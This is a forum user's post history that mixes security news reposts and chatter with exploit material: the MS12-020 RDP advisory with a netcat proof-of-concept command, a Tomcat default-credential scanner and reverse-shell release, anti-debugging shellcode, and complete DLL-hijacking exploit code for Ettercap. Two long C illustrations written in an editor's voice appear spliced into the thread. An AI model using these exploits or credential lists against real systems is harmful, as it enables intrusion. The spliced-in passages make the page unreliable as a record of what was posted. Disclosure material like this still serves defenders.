Everything posted by Nytro

  1. Cyber Criminals Selling Millions of U.S military email addresses

A web-based underground market service is currently selling millions of harvested U.S government and U.S military email addresses to potential spammers; find out just how easy it is to purchase that kind of data within the cyber crime ecosystem.

Cyber criminals are getting more sophisticated in their scams and phishing schemes, which are designed to steal personal data and financial information. Spammers and virus creators are motivated by money and backed by organized crime on a global scale. They are also launching massive attacks on anti-spam organizations in an attempt to bring them down.

In respect to targeted malware attacks, the service is currently offering 2.462.935 U.S government email addresses, and another 2.178.000 U.S military email addresses.

[Screenshot: the inventory of harvested emails currently offered for sale]

Spammers buy lists from brokers that continuously harvest email addresses from newsgroups, chat rooms, web sites, Internet directories, and more. Spammers also run dictionary attacks, throwing billions of combinations of words and numbers at an email database to find valid address combinations.

People are being tricked by email phishing scams that masquerade as legitimate business communications from their bank, mortgage provider, credit card company, PayPal, or eBay. Other popular spam-based Internet scams include foreign lotteries, investment schemes, chain letters, credit repair offers, advance-fee loan deals, check overpayment cons, and work-at-home ploys.

U.S government and U.S military users whose emails have been exposed are advised to be extra vigilant for potential targeted malware attacks enticing them into downloading and executing a malicious attachment, or attempting to trick them into clicking on a link in the email that serves client-side exploits.

Source: Cyber Criminals Selling Millions of U.S military email addresses | The Hacker News (THN)
  2. iPad 3 jailbroken on Launch Day by 3 ways

The new Apple iPad (third iPad, iPad 3) has already been jailbroken in at least three different ways. On the same day that Apple started shipping the new iPad out to consumers, there were reports that at least one hacker had already jailbroken the latest tablet.

The first to claim it was @Musclenerd, a member of the iPhone Dev Team, who tweeted a couple of images showing that he had already jailbroken the device. This must be a great relief for Apple fans who want to have their Apple devices, but don't want the Cupertino-based tech giant to keep them as restricted as it wants.

Within 24 hours of the iOS 5.1 update, teammate @pod2g revealed an untethered jailbreak for the iPad 2 and iPhone 4S, with the new iPad running iOS 5.1 and an A5X processor. His hack was followed by the announcement of a successful untethered jailbreak by teammate @i0n1c, who released a video as evidence of his accomplishment.

Finally, a tweet by @chpwn and @phoenixdev revealed a third successful jailbreak, with accompanying photos of the jailbroken new iPad running the Cydia Store: “Jailbroken iPad (3), using a different method by myself and @phoenixdev: http://db.tt/mqIZmw96 http://db.tt/g2UlawxV”

Jailbreaking an iPhone, iPod touch, or iPad makes it possible to install apps that aren't available in Apple's App Store, among other goodies. Hacking or jailbreaking Apple devices had been deemed illegal by officials in the US; jailbreaking devices so that they can run third-party software was then made legal in 2010 by the U.S. Copyright Office. However, that exemption is set to expire, and the Electronic Frontier Foundation (EFF) is asking people to lobby so that jailbreaking will continue to be protected by law.

Source: iPad 3 jailbroken on Launch Day by 3 ways | The Hacker News (THN)
  3. Kaspersky finds Malware that resides in your RAM

Kaspersky Lab researchers have discovered a drive-by download attack that evades hard-drive checkers by installing malware that lives in the computer's memory. The 'fileless' bot is more difficult for antivirus software to detect, and resides in memory until the machine is rebooted.

This malware, which doesn't create any files on the affected systems, was dropped onto the computers of visitors to popular news sites in Russia in a drive-by download attack. Drive-by download attacks are one of the primary methods of distributing malware over the web. They usually exploit vulnerabilities in outdated software products to infect computers without requiring user interaction.

The attack code loaded an exploit for a known Java vulnerability (CVE-2011-3544), but it wasn't hosted on the affected websites themselves. Once the malware infected a Microsoft machine, the bot disabled User Account Control, contacted a command and control server and downloaded the 'Lurk' Trojan. The malware also attacked Apple devices. The Java exploit's payload consisted of a rogue DLL that was loaded and attached on the fly to the legitimate Java process.

Normally this kind of malware is rare, because it dies when the system is rebooted and the memory is cleared. But the attackers do not really care, because there is a good chance that most victims will revisit the infected news websites. Once the malicious DLL is loaded into memory, it sends data to and receives instructions from a command and control server over HTTP.

Source: Kaspersky finds Malware that resides in your RAM | The Hacker News (THN)
  4. The Pirate Bay financier has been sentenced to electronic monitoring

At the beginning of the month, Swedish prosecutors launched a new investigation against the file-sharing site Pirate Bay. In 2009, Carl Lundström, together with the founders Gottfrid Svartholm Warg, Peter Sunde and Fredrik Neij, was sentenced to one year in prison each for complicity in copyright infringement, and they received a combined fine of 30 million kronor (4.4 million dollars). All four appealed, but in 2010 the Court of Appeal decided to uphold the sentences, except for Svartholm Warg, who was absent due to illness. At the same time, the sentence of Carl Lundström, who became very rich after the sale of his grandfather Karl Lundström's bread company, was reduced from one year to four months, and the millionaire was ordered to pay his share of 6.78 million dollars.

The three remaining pirates then sent a petition to the Supreme Court of Sweden, but in February 2012 it announced that it had refused their request and that the Court of Appeal's decision stands. The site piratebay.org could not be accessed for a while, visitors being redirected to a new address, thepiratebay.se, a domain registered with the Swedish company Binero by Fredrik Neij.

Now Carl Lundström, who will turn 52 next month, is ready to serve his sentence, but not in prison. Swedish law allows anyone sentenced to less than six months in prison to apply to work in the service of the community. Lundström chose this path, and his request was approved. The businessman will leave his home in Switzerland and return to Sweden, where he will spend four months under electronic monitoring in an apartment in the city of Gothenburg. He will be allowed to leave it only to go to a job arranged by the Swedish authorities, on a strict schedule. Although Lundström is obliged to pay the 6.78 million dollars, the Swedish authorities managed to find assets worth only 33,149 dollars.

The other three convicted men, Fredrik Neij, Peter Sunde and Gottfrid Svartholm, are to be informed about how they will serve their sentences. None of them currently lives in Sweden, and about Svartholm, from whom nobody has heard in a long time, there is a suspicion that he may have died in the meantime.

Photo: Flickr/SigNote Cloud

Source: http://totb.ro/finantatorul-pirate-bay-a-fost-condamnat-la-monitorizare-electronica
  5. #include <iostream>
#include <cstdlib>
#include <ctime>
using namespace std;
cout<<endl<<endl;

So it's .C?
  6. Yes, but a lot of weird things can happen too; I was getting BSODs 7-8 times a day. Well, I'm not the "hey, I'm getting BSODs, buy me another computer" type, but it took a while for me to figure out that the problem was a driver for the serial port... The "the network doesn't work" problems are the same. I know that I myself had plugged in a phone cable wrongly, and an infinite loop formed, and the network would work a bit, drop, work a bit again, drop again... And it's not necessarily easy to figure that out.
  7. It's somewhat easier as a sysadmin, you have a lot of free time, but problems like "Hey, my computer doesn't work, what should I do with it?" come up, or if something happens at 02:00 AM you would pretty much have to go and fix the problem; the sysadmins at my workplace came in on Saturday and Sunday to configure the network after they installed several servers, or they worked in the evening after hours until around 03:00 at night.
  8. Mystery of Duqu Programming Language Solved

An appeal for help from the programming community has allowed antivirus analysts to classify the unknown language used to develop key components of the Duqu Trojan. The sections responsible for downloading and executing additional modules in the Duqu Trojan, referred to by some as Stuxnet 2.0, were written in standard C++. Kaspersky Lab experts now say with a high degree of certainty that the Duqu framework was written using a custom object-oriented extension to C, generally called “OO C”, and compiled with Microsoft Visual Studio Compiler 2008 (MSVC 2008) with special options for optimizing code size and inline expansion.

Kaspersky's Igor Soumenkov wrote: “No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers.”

Kaspersky's analysis now concludes:
- The Duqu Framework consists of “C” code compiled with MSVC 2008 using the special options “/O1” and “/Ob1”
- The code was most likely written with a custom extension to C, generally called “OO C”
- The event-driven architecture was developed as a part of the Duqu Framework or its OO C extension
- The C&C code could have been reused from an already existing software project and integrated into the Duqu Trojan
- The Duqu Framework may have been created by a different programming team, since it is unique to Duqu, unlike many parts of Duqu that seem to be directly borrowed from Stuxnet.

It's believed that the developers are old school and don't trust C++, and that's probably why they relied on C. Another reason for using OO C is that back in the good old days it was more portable than C++. Knowing the techniques used to develop the malware allows Kaspersky's researchers to make better guesses about who might be behind the code.

Creating Duqu was a major project, so it's possible that an entirely different team was responsible for creating the Duqu Framework, while others worked on creating drivers and system infection exploits. In this scenario it's even possible that those who created the Duqu framework were ignorant of the real purpose of their work. Duqu was first detected in September 2011, but Kaspersky Lab believes it has seen the first pieces of Duqu-related malware dating back to August 2007. The Russian security firm also notes that Duqu, like Stuxnet before it, is highly targeted and related to Iran's nuclear program.

Source: Mystery of Duqu Programming Language Solved | The Hacker News (THN)
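To make the "OO C" and "event-driven" findings above concrete, here is an added illustration (my own code, not Kaspersky's analysis or anything from Duqu) of what that style looks like in plain C: structs whose first field points to a table of function pointers, a constructor that installs it, and an event loop that dispatches only through that table. The struct names and the queue size are my own assumptions; the point is the pattern an analyst sees as `mov eax,[obj] / call [eax+N]` in a disassembly.

```c
#include <stdlib.h>
#include <string.h>

/* Base "class": the first field is a pointer to a table of function pointers. */
struct object;
struct vtable {
    void (*on_event)(struct object *self, int event_id);
    void (*destroy)(struct object *self);
};
struct object {
    const struct vtable *vt;
    int handled;            /* how many events this object has processed */
};

/* "Subclass": base layout first, then its own fields, so a struct counter*
   can be passed wherever a struct object* is expected. */
struct counter {
    struct object base;
    int last_event;
};

static void counter_on_event(struct object *self, int event_id) {
    struct counter *c = (struct counter *)self;   /* unchecked downcast: no safe pointers */
    c->base.handled++;
    c->last_event = event_id;
}
static void counter_destroy(struct object *self) {
    free(self);   /* manual memory management: the caller must not touch self afterwards */
}
static const struct vtable counter_vt = { counter_on_event, counter_destroy };

/* Constructor: allocate, then install the vtable. */
struct counter *counter_new(void) {
    struct counter *c = calloc(1, sizeof *c);
    if (c) c->base.vt = &counter_vt;
    return c;
}

/* Event loop: a bounded FIFO of event ids, drained in order and dispatched
   through the target's vtable, so the loop never names a concrete type. */
#define QUEUE_LEN 16
struct event_loop {
    int queue[QUEUE_LEN];
    unsigned head, tail;
};

void loop_init(struct event_loop *l) { memset(l, 0, sizeof *l); }

/* Returns 1 if queued, 0 if the queue is full (the caller decides what to do). */
int loop_post(struct event_loop *l, int event_id) {
    if (l->tail - l->head >= QUEUE_LEN) return 0;
    l->queue[l->tail++ % QUEUE_LEN] = event_id;
    return 1;
}

/* Drains the queue into target; returns the number of events dispatched. */
int loop_run(struct event_loop *l, struct object *target) {
    int dispatched = 0;
    while (l->head != l->tail) {
        int ev = l->queue[l->head++ % QUEUE_LEN];
        target->vt->on_event(target, ev);   /* indirect call, resolved at run time */
        dispatched++;
    }
    return dispatched;
}
```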
  9. Apache Tomcat Remote Exploit (PUT Request) and Account Scanner

ISOWAREZ RELEASE
By KINGCOPE - YEAR 2012

-== Apache Tomcat Remote Exploit and Account Scanner ==-

the modified pnscan scanner utility scans a range of IPs to find open apache tomcat servers by trying the following login access combinations:

tomcat:tomcat
password:password
admin:admin
admin:password
admin:<nopassword>
tomcat:<nopassword>

the included perl script can be used to unlock apache tomcat servers remotely by using the collected login combinations. it will retrieve either a root or SYSTEM reverse shell depending on the operating system or the equivalent of a reverse shell as the current user tomcat is running as. the exploit might contain metasploit logic (thanks to jduck).

Enjoy :>
/Kingcope

http://www.exploit-db.com/sploits/tomcat-remote.zip

Source: Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
  10. offtopic
    Which park, Izvor? How far out do you get acceptable signal?
  11. It exists on a Chinese hosting site, but I haven't tried it.
  12. Full disclosure

#######################################################################

                             Luigi Auriemma

Application:  Microsoft Terminal Services / Remote Desktop Services
              http://www.microsoft.com
              http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
Versions:     any Windows version before 13 Mar 2012
Platforms:    Windows
Bug:          use after free
Exploitation: remote, versus server
Date:         16 Mar 2012 (found 16 May 2011)
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

Additional references:
  http://www.zerodayinitiative.com/advisories/ZDI-12-044/
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's homepage:
"The Microsoft Remote Desktop Protocol (RDP) provides remote display and input capabilities over network connections for Windows-based applications running on a server. RDP is designed to support different types of network topologies and multiple LAN protocols."

#######################################################################

======
2) Bug
======

The Remote Desktop Protocol is used by the "Terminal Services / Remote Desktop Services" and works at kernel level on port 3389.

There is a use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value less than or equal to 5.

The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect, while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer. The following dump is taken from Windows 2003 Server:

f761887c 8bff            mov     edi,edi
f761887e 55              push    ebp
f761887f 8bec            mov     ebp,esp
f7618881 56              push    esi
f7618882 57              push    edi
f7618883 8b7d08          mov     edi,dword ptr [ebp+8]
f7618886 8d47ec          lea     eax,[edi-14h]
f7618889 50              push    eax
f761888a eb09            jmp     termdd!IcaBufferAlloc+0x19 (f7618895)
f761888c 8b4618          mov     eax,dword ptr [esi+18h]   ; we are here
f761888f 833800          cmp     dword ptr [eax],0         ; or here
f7618892 7527            jne     termdd!IcaBufferAlloc+0x3f (f76188bb)   ; must jump
f7618894 56              push    esi
f7618895 e878290000      call    termdd!IcaGetPreviousSdLink (f761b212)  ; the new ESI is returned by this function
f761889a 8bf0            mov     esi,eax
f761889c 85f6            test    esi,esi
f761889e 75ec            jne     termdd!IcaBufferAlloc+0x10 (f761888c)
f76188a0 ff751c          push    dword ptr [ebp+1Ch]
f76188a3 ff7518          push    dword ptr [ebp+18h]
f76188a6 ff7514          push    dword ptr [ebp+14h]
f76188a9 ff7510          push    dword ptr [ebp+10h]
f76188ac ff750c          push    dword ptr [ebp+0Ch]
f76188af 57              push    edi
f76188b0 e8b9fcffff      call    termdd!IcaBufferAllocInternal (f761856e)
f76188b5 5f              pop     edi
f76188b6 5e              pop     esi
f76188b7 5d              pop     ebp
f76188b8 c21800          ret     18h
f76188bb 33c0            xor     eax,eax
f76188bd 53              push    ebx
f76188be 8d7e10          lea     edi,[esi+10h]
f76188c1 40              inc     eax
f76188c2 f00fc107        lock xadd dword ptr [edi],eax
f76188c6 ff751c          push    dword ptr [ebp+1Ch]
f76188c9 8b4618          mov     eax,dword ptr [esi+18h]   ; the same value of before
f76188cc ff7518          push    dword ptr [ebp+18h]
f76188cf ff7514          push    dword ptr [ebp+14h]
f76188d2 ff7510          push    dword ptr [ebp+10h]
f76188d5 ff750c          push    dword ptr [ebp+0Ch]
f76188d8 ff761c          push    dword ptr [esi+1Ch]
f76188db ff10            call    dword ptr [eax]           ; code execution
f76188dd 8bd8            mov     ebx,eax
f76188df 83c8ff          or      eax,0FFFFFFFFh
f76188e2 f00fc107        lock xadd dword ptr [edi],eax
f76188e6 7506            jne     termdd!IcaBufferAlloc+0x72 (f76188ee)
f76188e8 56              push    esi
f76188e9 e8382f0000      call    termdd!_IcaUnloadSd (f761b826)
f76188ee 8bc3            mov     eax,ebx
f76188f0 5b              pop     ebx
f76188f1 ebc2            jmp     termdd!IcaBufferAlloc+0x39 (f76188b5)

eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240
eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
termdd!IcaBufferAlloc+0x10:
f762888c 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:040b041a=????????

ChildEBP RetAddr
b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10
b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26
b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29
b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14
b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16
b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27
b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70
b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23
b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86
b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112
b8b39b08 b89ac786 RDPWD!WDWConnect+0x368
b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94
b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227
b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35
b8b39bac f762ca10 termdd!_IcaCallStack+0x55
b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414
b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e
b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a
b8b39c50 808ed4eb nt!IofCallDriver+0x45
b8b39c64 808ee28d nt!NtWriteFile+0x2943
b8b39d00 808e6dbc nt!NtWriteFile+0x36e5
b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a
b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14
b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14

On Windows 2003 that zone of the memory pointed by ESI+18 using the provided proof-of-concept is ever in the range 040b02??-040b04??. The exploitability depends on the possibility of controlling ESI or the content pointed by it (maybe via a form of heap spraying?), indeed in my quick tests this zone sometimes is allocated and others it isn't.

Note that on the post-Vista Windows versions (like 7 and 2008) it "seems" necessary to have "Allow connections from computers running any version of Remote Desktop" for being vulnerable. Anyway I'm not totally sure about this so-called limitation because it looks like it depends on my proof-of-concept only.

The provided proof-of-concept uses the BER integer values set at 32bit (big endian) in case they could be useful for easier debugging.

Additional details about the protocol:
http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/termdd_1.dat
http://www.exploit-db.com/sploits/18606.dat

  nc SERVER 3389 < termdd_1.dat

resend it multiple times in case of no results and note that this is just a simple proof-of-concept packet to quickly test the bug so it's not optimized at all.

#######################################################################

======
4) Fix
======

http://technet.microsoft.com/en-us/security/bulletin/ms12-020

#######################################################################

Luigi Auriemma FTW!
  13. I apologize, it's my fault, I fixed the problem.
  14. Write a small C program (a few lines are enough) that detects whether a processor is little endian or big endian. I think you know what the difference is... It's not hard at all; answers by PM. Answered so far:
- Ellimist
- BGS
- H3xoR
- NemesisITSC
- Matei
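As an added worked answer to the exercise above (my own code, not any forum member's PM reply), this shows the two classic probes and then why the answer matters when parsing: a reader for a 32-bit big-endian field, like the BER integers the advisory earlier on this page mentions, written with shifts so it is correct on either kind of host, next to the naive memcpy version that is only right on a big-endian CPU. The 4-byte sample buffer is constructed here for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Probe 1: store a known 32-bit value and inspect its first byte in memory.
   On a little-endian CPU the least significant byte (0x04) comes first. */
int is_little_endian_union(void) {
    union { uint32_t word; unsigned char bytes[4]; } probe;
    probe.word = 0x01020304u;
    return probe.bytes[0] == 0x04;
}

/* Probe 2: the same idea through a char pointer (the well-known one-liner). */
int is_little_endian_ptr(void) {
    uint16_t word = 1;
    return *(unsigned char *)&word == 1;
}

/* Byte-order-independent read of a big-endian 32-bit field (network/file
   order). Shifts operate on values, not on memory layout, so the result is
   the same on both kinds of host. */
uint32_t read_be32(const unsigned char *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* The mistake the exercise is meant to prevent: copy the raw bytes into an
   integer and trust them. This is only correct on a big-endian host. */
uint32_t read_be32_naive(const unsigned char *p) {
    uint32_t v;
    memcpy(&v, p, sizeof v);
    return v;
}

/* Constructed sample: a 32-bit big-endian integer with the value 5. */
static const unsigned char SAMPLE[4] = { 0x00, 0x00, 0x00, 0x05 };

/* 1 when the naive read happens to agree with the correct one (i.e. the
   host is big endian), 0 on a little-endian host where it yields 0x05000000. */
int naive_read_matches_host(void) {
    return read_be32_naive(SAMPLE) == read_be32(SAMPLE);
}

int main(void) {
    printf("union probe:   %s endian\n", is_little_endian_union() ? "little" : "big");
    printf("pointer probe: %s endian\n", is_little_endian_ptr() ? "little" : "big");
    printf("read_be32(SAMPLE) = %u, naive read = %u\n",
           (unsigned)read_be32(SAMPLE), (unsigned)read_be32_naive(SAMPLE));
    return 0;
}
```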
  15. I don't want to seem like a jerk, but I piss on him and on the whole crap that is Romanii au Talent.
  16. Securitytube Speak Up: The Ms12-020 Fiasco!
Suspicions aroused as exploit for critical Windows bug is leaked (Updated)
http://aluigi.org/adv/ms12-020_leak.txt
  17. bizarre
    IPs from Uzbekistan, Thailand, Mali (I hadn't heard of this country), Colombia and other countries, IPs that repeat. It might be a DDoS, but it's a pathetic one with no chance of success.
  18. bizarre
    All of them on the index, what the hell are they looking for? There were 15,000 at one point, and more than 1000 at other times, who knows why...
  19. Don't build your dreams on promises of raises; reality is a bit harsher.
  20. "and you have no fucking idea what an SVN is, or Google Code" What words you picked to make yourself look smart...
  21. Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately

By Brian Prince on March 13, 2012

Microsoft is urging organizations to apply the sole critical update in this month's Patch Tuesday release as soon as possible. The critical bulletin, one of six security bulletins issued as part of today's release, addresses two vulnerabilities in the Remote Desktop Protocol (RDP).

“A little about MS12-020…this bulletin addresses one Critical-class issue and one Moderate-class issue in Remote Desktop Protocol (RDP),” Angela Gunn, security response communications manager for Microsoft's Trustworthy Computing Group, explained in a blog post. “Both issues were cooperatively disclosed to Microsoft and we know of no active exploitation in the wild. The Critical-class issue applies to a fairly specific subset of systems – those running RDP – and is less problematic for those systems with Network Level Authentication (NLA) enabled.”

“That said, we strongly recommend that customers examine and prepare to apply this bulletin as soon as possible,” she added. “The Critical-class issue could allow a would-be attacker to achieve remote code execution on a machine running RDP (a non-default configuration); if the machine does not have NLA enabled, the attacker would not require authentication for RCE access.”

Ben Greenbaum, senior principal software engineer for Symantec's Security Intelligence Group, agreed users should pay close attention to the RDP vulnerability. “RDP's purpose is to enable remote access from the Internet, but preferably to an authenticated user,” he said. “In this case, a malicious attacker can potentially take complete control of the computer. Failed exploit attempts of this issue will likely result in the user being confronted with the blue screen of death. If an attacker can bypass standard memory protection measures, however, they will have access at the kernel level.”

Those IT admins who use RDP to manage their machines over the internet, which is essentially the default in cloud-based installations such as Amazon's AWS, need to patch as quickly as possible, Qualys CTO Wolfgang Kandek opined. “If the patch cannot be applied that quickly or the necessary reboot cannot be scheduled, IT Admins should look into the available work-arounds that function immediately: protect the machine with restrictive firewalling, access RDP through a VPN service or switch to Microsoft's NLA protocol that is supported in newer versions of Windows (Vista+) and is not vulnerable to the attack,” he said.

Besides the RDP bugs, this month's Patch Tuesday addressed five other vulnerabilities: two denial-of-service bugs and an escalation of privileges issue in Microsoft Windows; a remote code execution vulnerability in Microsoft Expression Design; and an escalation of privileges issue in Microsoft Visual Studio. All those issues are rated ‘important’ with the exception of one of the Windows denial-of-service bugs, which is rated ‘moderate.’

Also today, Adobe updated its ColdFusion software to address a vulnerability in versions 9.0.1 and earlier for Windows, Macintosh and UNIX systems that could lead to a denial-of-service attack using a hash algorithm collision. The company said it was unaware of any attempts to exploit the vulnerability in the wild.

Source: Microsoft: Remote Desktop Protocol Vulnerability Should be Patched Immediately | SecurityWeek.Com
Via: Microsoft: RDP Vulnerability Should Be Patched Immediately - Slashdot
  22. win xp sp2 PEB ISbeingdebugged shellcode

#name: win xp sp2 PEB ISbeingdebugged shellcode
#Author: *********
#Contact: teo.manojlovic@skole.hr
#Date: 14.12.2009.

here is the ASM code made using masm32. if the program is being run under a debugger the shellcode will start beeping

//////////////////////begin///////////////////////////////////////
.386
.model flat, stdcall
option casemap :none

INCLUDE C:\MASM32\INCLUDE\WINDOWS.INC
INCLUDE C:\MASM32\INCLUDE\KERNEL32.INC
INCLUDE C:\MASM32\INCLUDE\USER32.INC
INCLUDE C:\MASM32\INCLUDE\MASM32.INC
INCLUDELIB C:\MASM32\LIB\KERNEL32.LIB
INCLUDELIB C:\MASM32\LIB\USER32.LIB
INCLUDELIB C:\MASM32\LIB\MASM32.LIB

.data
ExitMsg DB "Enter to Exit", 0

.code
start:
    assume fs:nothing
    mov eax, fs:[30h]        ; PEB address from the TEB
    mov eax, [eax+02h]       ; dword starting at PEB.BeingDebugged (offset 2)
    mov ebx, 7FFF8000h
    add ebx, 7FFF8000h
    inc ebx                  ; ebx = 0FFFF0001h: BeingDebugged = 1 plus the bytes that follow it on XP SP2
    push 300h                ; Beep duration
    push 200h                ; Beep frequency
    mov edx, 7c837a8fh       ; hardcoded address of kernel32.Beep on XP SP2
    cmp eax, ebx
    jnz exit                 ; not debugged: exit silently
    call edx                 ; debugged: beep
exit:
    invoke ExitProcess, NULL
end start
/////////////////////////////end///////////////////////////////

here is the dump of the code using olly debugger

00401000 >/$ 64:A1 30000000  MOV EAX,DWORD PTR FS:[30]
00401006 |. 8B40 02         MOV EAX,DWORD PTR DS:[EAX+2]
00401009 |. BB 0080FF7F     MOV EBX,7FFF8000
0040100E |. 81C3 0080FF7F   ADD EBX,7FFF8000
00401014 |. 43              INC EBX
00401015 |. 68 00030000     PUSH 300                                 ; /Duration = 768. ms
0040101A |. 68 00020000     PUSH 200                                 ; |Frequency = 200 (512.)
0040101F |. BA 8F7A837C     MOV EDX,kernel32.Beep                    ; |
00401024 |. 3BC3            CMP EAX,EBX                              ; |
00401026 |. 75 02           JNZ SHORT antidebu.0040102A              ; |
00401028 |. FFD2            CALL EDX                                 ; \Beep
0040102A |> 6A 00           PUSH 0                                   ; /ExitCode = 0
0040102C \. E8 01000000     CALL <JMP.&kernel32.ExitProcess>         ; \ExitProcess
00401031    CC              INT3
00401032 .-FF25 00204000    JMP DWORD PTR DS:[<&kernel32.ExitProcess>; kernel32.ExitProcess

here is the shellcode

\x64\xA1\x30\x00\x00\x00\x8B\x40\x02\xBB\x00\x80\xFF\x7F\x81\xC3\x00\x80\xFF\x7F\x43\x68\x00\x03\x00\x00\x68\x00\x02\x00\x00\xBA\x8F\x7A\x83\x7C\x3B\xC3\x75\x02\xFF\xD2\x6A\x00\xE8\x01\x00\x00\x00\xCC\xFF\x25\x00\x20\x40\x00

Source: win xp sp2 PEB ISbeingdebugged shellcode

Efficient anti-debugging...
  23. Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)

/*
Exploit Title: Ettercap NG-0.7.3 DLL hijacking (wpcap.dll)
Date: 25/08/2010
Author: *********
Tested on: Windows XP SP3
Vulnerable extensions: .pcap

Compile and rename to wpcap.dll, create a file with the .pcap extension in the same dir and visit http://chaossecurity.wordpress.com/
*/

#include <windows.h>
#include <stdlib.h>     /* exit() */

#define DLLIMPORT __declspec (dllexport)

int evil(void);         /* prototype: evil() is defined below the exports that call it */

DLLIMPORT void pcap_findalldevs() { evil(); }
DLLIMPORT void pcap_close() { evil(); }
DLLIMPORT void pcap_compile() { evil(); }
DLLIMPORT void pcap_datalink() { evil(); }
DLLIMPORT void pcap_datalink_val_to_description() { evil(); }
DLLIMPORT void pcap_dump() { evil(); }
DLLIMPORT void pcap_dump_close() { evil(); }
DLLIMPORT void pcap_dump_open() { evil(); }
DLLIMPORT void pcap_file() { evil(); }
DLLIMPORT void pcap_freecode() { evil(); }
DLLIMPORT void pcap_geterr() { evil(); }
DLLIMPORT void pcap_getevent() { evil(); }
DLLIMPORT void pcap_lib_version() { evil(); }
DLLIMPORT void pcap_lookupdev() { evil(); }
DLLIMPORT void pcap_lookupnet() { evil(); }
DLLIMPORT void pcap_loop() { evil(); }
DLLIMPORT void pcap_open_live() { evil(); }
DLLIMPORT void pcap_open_offline() { evil(); }
DLLIMPORT void pcap_setfilter() { evil(); }
DLLIMPORT void pcap_snapshot() { evil(); }
DLLIMPORT void pcap_stats() { evil(); }

/* payload of the proof of concept: any exported entry point just spawns calc and exits */
int evil(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

Source: Ettercap NG-0.7.3 DLL Hijacking Exploit (wpcap.dll)

I posted it just as a reminder of this "trick"...
  24. Pff, I don't know what the manea is called